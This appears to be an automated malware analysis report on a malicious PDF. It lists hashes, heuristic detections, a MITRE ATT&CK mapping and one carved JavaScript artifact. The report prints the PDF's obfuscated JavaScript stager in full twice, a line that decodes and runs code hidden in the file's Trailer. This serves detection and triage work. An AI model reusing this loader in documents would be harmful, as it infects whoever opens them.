PDF malware analysis — malicious · d290758eb50c1dfb

MALICIOUS

PDF

4.7 KB Created: 2008-09-24 19:47:56 Authoring application: Adobe (via Notepad) First seen: 2026-05-11

MD5: 9473ee40a0ccf44d70c5b0e4e1eb7bcd SHA-1: 279fed898aba68456937c4e7df41e77a4d3a9ad2 SHA-256: d290758eb50c1dfb916601327891bf52ae96c07a25a204215dd7458b9809dfb0

148 Risk Score

Malware Insights

MITRE ATT&CK

T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The PDF_UNESCAPE heuristic suggests the JavaScript is obfuscated. The extracted artifact javascript_obj0006_000.js is likely responsible for downloading and executing a second-stage payload. The document body is unreadable, but the presence of obfuscated JavaScript points to a malicious intent.

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 4

JavaScript action low 2 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER

PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
Matched line in script
```
exmu='dmw';if(app.alert)exmu='';WmMw=this;zisc=WmMw.info;exmu=exmu+unescape('%')+exmu;y1vw=zisc.Trailer.replace(/([A-Z])/g,exmu);app.setTimeOut(unescape(y1vw),3)
```
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`javascript_obj0006_000.js`	pdf-javascript-stream	PDF /JS object 6 at offset 0xFE2	161 bytes
SHA-256: `8277cf591dfb5c635a97122f74d24d22fac9f9637e7738e9e2cc91c78bab611e`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script exmu='dmw';if(app.alert)exmu='';WmMw=this;zisc=WmMw.info;exmu=exmu+unescape('%')+exmu;y1vw=zisc.Trailer.replace(/([A-Z])/g,exmu);app.setTimeOut(unescape(y1vw),3)

Open this report in the interactive analyzer, or submit your own file for analysis.